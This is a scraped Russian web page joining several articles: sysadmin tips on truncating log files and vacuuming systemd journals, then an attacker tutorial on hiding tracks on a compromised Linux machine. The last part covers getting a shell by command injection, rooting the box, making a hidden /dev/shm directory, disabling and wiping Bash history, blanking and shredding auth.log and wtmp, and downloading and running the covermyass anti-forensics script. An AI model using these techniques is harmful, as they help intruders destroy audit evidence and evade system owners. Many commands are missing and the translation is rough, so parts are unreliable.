Меню Рубрики

Linux как очистить логи

Как очистить или удалить файлы журнала в Linux или UNIX?

Размер файла журнала моего веб-сервера довольно большой. Как удалить файл журнала в Linux, не помешав работе приложений? Существует ли правильный способ очистки файлов журналов в Unix?

Вы можете просто обрезать файл журнала, используя «> именя-файла«. Например, если имя файла журнала — /var/log/foo, попробуйте выполнить «> /var/log/foo» от имени пользователя root.

Как очистить содержимое файла журнала из командной строки?

Скажем, вы хотите очистить содержимое файла журнала с именем /var/log/messages, выполните:

Следующая команда совместима с различными оболочками Linux и Unix:

Проверьте размер файла:

Если вы действительно хотите удалить или очистить файл, введите следующую команду rm:

Удаление файлов журнала в Linux или UNIX с использованием команды truncate

Используйте команду truncate, чтобы уменьшить или увеличить размер каждого ФАЙЛА до указанного размера. Одним из способов очистки файла журнала с именем www.blog.sedicomm_access.log — выполнить следующую команду:

Другие команды для очистки/удаления содержимого файлов в Linux

Попробуйте команду cat:

Или команду cp:

Как очистить файл журнала, используя dd в Linux или Unix?

Введите команду dd следующим образом:

Как очистить файл в Linux с помощью echo /printf?

Еще один метод — использовать команду echo:

Инструмент logrotate

Лучше всего использовать инструмент logrotate. Он предназначен для упрощения администрирования систем, которые генерируют большое количество файлов журналов. Данный инструмент позволяет автоматически увеличивать, сжимать, удалять и отправлять файлы журналов по почте. Каждый файл журнала может обрабатываться ежедневно, еженедельно, ежемесячно или только тогда, когда он становится слишком большим.

Заключение

В этой статье показано, как очистить или удалить содержимое большого файла журнала в системах, подобных Linux и Unix.

Спасибо за уделенное время на прочтение статьи!

Если возникли вопросы, задавайте их в комментариях.

Подписывайтесь на обновления нашего блога и оставайтесь в курсе новостей мира инфокоммуникаций!

Источник

2 мин для чтения Как очистить файл журнала в Linux

Вы окажетесь в ситуациях, когда вам нужно очистить файл. Это часто случается, когда у вас огромные файлы журналов, и как бы вы это сделали?

Один не очень чистый способ – удалить файл, а затем создать новый файл. Но это не очень хорошая идея. Это не будет тот же файл, временная метка (atime, mtime и т. д.). Будет отличаться вместе с другими правами доступа к файлам.

Вместо создания нового пустого файла вы можете удалить его содержимое. Итак, как вы очищаете файл в Linux? Как очистить файл от всего его содержимого без удаления самого файла?

4 способа очистить файл в Linux

Существует несколько способов очистки файла без его фактического удаления. Позвольте нам показать вам некоторые из этих методов.

Способ 1: усечь файл с помощью команды truncate

Самый безопасный способ обрезать файл журнала – использовать команду truncate.

В приведенной выше команде -s используется для установки/настройки размера (в байтах) файла. Когда вы используете -s 0, это означает, что вы изменили размер файла до 0 байт.

Способ 2: Пустой файл, используя :> или >

Самый простой способ очистить файл – использовать команду ниже. Если файл не используется, он будет работать в Bash:

Хотя вышеперечисленное работает только в Bash Shell, вы можете использовать аналогичную команду для других оболочек:

Вы также можете использовать эту команду для очистки файла:

Способ 3: использование команды echo для очистки файла в Linux

Другой способ очистить файл – использовать команду echo в Linux:

Вы также можете использовать команду echo следующим образом:

Способ 4: используйте /dev/null, чтобы очистить файл

Вы также можете использовать знаменитую /dev/null и объединить ее с командой cat для очистки файла журнала:

И если у вас недостаточно прав для какой-либо из вышеперечисленных команд, это верный выстрел, но немного грязный способ добиться этого:

Мы надеемся, что этот быстрый совет помог вам очистить файл в Linux. Добавьте нас в закладки для получения дополнительных советов по Linux.

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Источник

2 мин для чтения Как очистить журналы logs в Systemd

Журнал systemd – это собственная система журналирования systemd. Это эквивалентно системному журналу в системе инициализации. Она собирает и хранит данные журнала ядра, сообщения системного журнала, стандартный вывод и ошибки для различных системных служб.

Машина Linux с systemd записывает журналы в каталог /var/log/journal. Если вы помните структуру каталогов Linux , в /var хранятся системные журналы.

Что касается ведения журнала, то со временем она начинает расти. И если вы проверите дисковое пространство в Linux, вы увидите, что иногда это занимает несколько ГБ.

Позвольте нам показать вам, как очистить журналы systemd и освободить место на диске в вашей системе Linux.

Очистка журналов журнала systemd

Сначала проверьте пространство, занятое журналами журнала, с помощью команды du:

Вы также можете использовать команду journalctl для той же задачи:

Обе команды должны дать примерно одинаковый результат:

Теперь, когда вы знаете, сколько места занимают журналы журнала, вы можете решить, хотите ли вы очистить журналы или нет. Если вы решите очистить журналы журнала, позвольте мне показать вам несколько способов сделать это.

Конечно, вы можете использовать команду rm для удаления файлов в папке журнала, но мы не будем этого советовать. Команда journalctl дает вам правильный способ обработки старых журналов.

Первое, что вы должны сделать, это повернуть файлы журнала. Это пометит текущие активные журналы журнала как архив и создаст новые новые журналы. Это необязательно, но это хорошая практика.

Теперь у вас есть два способа очистить старые журналы журнала. Вы либо удаляете журналы старше определенного времени, либо удаляете старые файлы журналов, чтобы общий размер журнала был ограничен предварительно определенным пространством на диске. Давайте посмотрим оба метода.

1. Очистить журнал журнала старше x дней

Имейте в виду, что журналы важны для целей аудита, поэтому не следует удалять их все одновременно. Допустим, вы хотите сохранить историю логов всего за два дня. Чтобы удалить все записи старше двух дней, используйте эту команду:

Вот как может выглядеть вывод:

Вы также можете изменить временной интервал предоставления в часах, например, 2 часа, в минутах, например, 2 м, в секундах, например, 2 с. Если вы хотите больше единиц времени, вы также можете 2 недели, 2 месяца.

2. Ограничить журналы до определенного размера

Другой способ – ограничить размер журнала. При этом файлы журнала будут удаляться до тех пор, пока дисковое пространство, занятое журналами журнала, не станет меньше указанного вами размера.

Это уменьшит размер журнала примерно до 100 МБ.

Вы можете указать размер в ГБ с G, МБ с М, КБ с К и т. д.

Надеюсь, вам понравится этот быстрый совет по очистке файлов журналов systemd. Если у вас есть какие-либо вопросы или предложения, пожалуйста, оставьте комментарий ниже.

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Источник

Как отчистить журналы и историю в системах Linux чтобы скрыть свои следы и остаться незамеченными.

Заключительный этап эксплуатации-это скрытие ваших следов, которое включает в себя стирание всех действий и журналов, чтобы злоумышленник не мог обнаружить вашу информацию.

Чтобы показать вам основы скрытия ваших следов, мы сначала скомпрометируем цель а затем изучим некоторые методы используемые для удаления истории Bash, очистки журналов и сохранения скрытости после использования системы Linux.

Шаг 1 компрометация цели

Первое, что нам нужно сделать, это использовать цель. Мы можем использовать инъекцию команд чтобы злоупотреблять тем как сервер обрабатывает команды ОС чтобы получить оболочку.

Мы также хотим обновить нашу новую оболочку до полностью интерактивной. Это позволит упростить работу в целом, а также позволит нам использовать Tab completion и историю терминала.После этого мы можем расширить наши привилегии до root, чтобы мы могли лучше использовать преимущества системы, дабы быть незамеченными.

Шаг 2 создайте простой в удалении скрытый каталог

После того как у нас появился корневой доступ мы можем создать скрытый каталог для разработки и хранения любых сценариев или файлов. Это не обманет никого кроме самого noobie администратора, но еще один уровень осторожности конечно не повредит. Во-первых давайте найдем все доступные для записи каталоги с помощью следующей команды:

Мы можем создать скрытый каталог с помощью команды mkdir и путем добавления перед именем точки:

Если мы сейчас перечислим содержимое файла /dev / shm, ничего не появится:

Только когда мы используем переключатель -a для отображения списка всех файлов и каталогов, он отображается:

total 0
drwxrwxrwt 3 root root 60 2019-06-19 13:49 .
drwxr-xr-x 13 root root 13480 2019-06-19 13:41 ..
drwxr-xr-x 2 root root 40 2019-06-19 13:49 .secret

И чтобы удалить каталог, как только мы закончим на машине, используйте команду rmdir :

root@target:/# rmdir /dev/shm/.secret/

Шаг 3 удалите историю Bash

Bash сохраняет в памяти список команд используемых в текущем сеансе поэтому важно очистить его чтобы скрыть ваши следы. Мы можем просмотреть текущую историю с помощью команды история:

1 cd /
2 ls
3 find / -perm -222 -type d 2>/dev/null
4 cd /dev/shm/
5 cd /
6 mkdir /dev/shm/.secret
7 ls -l /dev/shm/
8 ls -la /dev/shm/
9 ls
10 rmdir /dev/shm/.secret/
11 history

Команды записываются в переменную окружения HISTFILE, что обычно и происходит bash_history. Мы можем повторить чтобы увидеть местоположение:

Мы можем использовать команду unset для удаления переменной:

Поэтому когда мы повторяем это снова ничего не появляется:

Мы также можем убедиться, что история команд не хранится отправив ее в /dev/null. Установите для него переменную:

Или сделайте то же самое с командой export:

И история теперь будет отправлена в /dev / null :

Мы можем установить количество команд, которые будут сохранены в текущем сеансе, равным 0, используя переменную HISTSIZE:

Кроме того, можно использовать команду export:

Мы также можем изменить количество строк разрешенных в файле истории используя переменную HISTFILESIZE. Установите его значение равным 0:

Команда set также может быть использована для изменения параметров оболочки. Чтобы отключить параметр история используйте следующую команду:

И чтобы включить его снова:

Аналогично, команда shopt может быть использована для изменения параметров оболочки. Чтобы отключить журнал, используйте следующую команду:

И чтобы включить его снова:

При выполнении команд в целевой системе иногда можно избежать сохранения их в историю запустив команду с ведущим пробелом:

Эта техника не работает все время и зависит от системы.

Мы также можем просто очистить историю с помощью переключателя -c :

Чтобы убедиться, что изменения записаны на диск, используйте переключатель -w :

Это позволит лишь очистить историю текущей сессии. Чтобы полностью убедиться что история очищается при выходе из сеанса, следующая команда пригодится:

/.bash_history && history -c && exit

Мы также можем использовать команду kill для выхода из сеанса без сохранения истории:

Шаг 4 Очистите Файлы журнала

В дополнение к истории Bash файлы журнала также должны быть стерты чтобы остаться незамеченными. Вот некоторые общие файлы журналов и то что они содержат:

/var / log / auth.проверка подлинности журнала

Конечно, мы можем просто удалить журнал с помощью команды rm:

Но это вероятно вызовет красные флаги поэтому лучше очистить файл а не стирать его полностью. Мы можем использовать команду усечения чтобы уменьшить размер до 0:

Обратите внимание что усечение не всегда присутствует на всех системах.

Мы можем сделать то же самое ничего не отображая в файле:

А также с помощью >> самостоятельно очистить файл:

Мы также можем отправить его в /dev / null:

Или используйте команду tee :

Мы также можем использовать команду dd , чтобы ничего не записывать в файл журнала:

0+0 records in
0+0 records out
0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s

Команда shred может быть использована для перезаписи файла с бессмысленными двоичными данными:

Мы даже можем прикрепить on -zu который будет усекать файл и перезаписывать его нулями чтобы скрыть доказательства измельчения:

Шаг 5 Используйте инструмент чтобы гарантировать что вещи стираются

Чтобы увеличить вероятность того что какая-либо активность на цели не будет обнаружена мы можем использовать инструмент чтобы убедиться что все стирается. Covermyass- это скрипт который автоматизирует большую часть процессов, которые мы уже рассмотрели включая очистку файлов журнала и отключение истории Bash.

Мы можем захватить скрипт из GitHub с помощью wget (если у нас есть доступ к интернету на цели, в противном случае, он должен быть передан вручную):

root@target:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass

Перейдите в каталог доступный для записи и используйте chmod , чтобы сделать его исполняемым:

Тогда мы сможем запустить его:

Welcome to Cover my ass tool !

1) Clear logs for user root
2) Permenently disable auth & bash history
3) Restore settings to default
99) Exit tool

Нам предоставляется пользовательское приглашение с несколькими вариантами на выбор. Давайте выберем первый, чтобы очистить журналы:

[+] /var/log/messages cleaned.
[+] /var/log/auth.log cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+]

/.bash_history cleaned.
[+] History file delete d.

Reminder: your need to reload the session to see effects.
Type exit to do so.

Мы также можем отключить историю Bash и auth с опцией 2:

[+] Permanently sending /var/log/auth.log to /dev/null
[+] Permanently sending bash_history to /dev/null
[+] Set HISTFILESIZE & HISTSIZE to 0
[+] Disabled history library

Permenently d isabled bash log.

А на случай если вам нужно все убрать в спешке просто добавте now к команде:

[+] /var/log/messages cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+]

/.bash_history cleaned.
[+] History file deleted.

Reminder: your need to reload the session to see effects.
Type exit to do so.

Сегодня мы изучили различные методы используемые для скрытия следов и как оставаться незамеченными на скомпрометированной машине. Мы рассмотрели способы отключения и удаления истории Bash, методы очистки файлов журнала и использовали инструмент Covermyass для обеспечения того чтобы наша деятельность на цели была стерта.

Критикуйте ,комментируйте,палец в верх )))))

Источник


Adblock
detector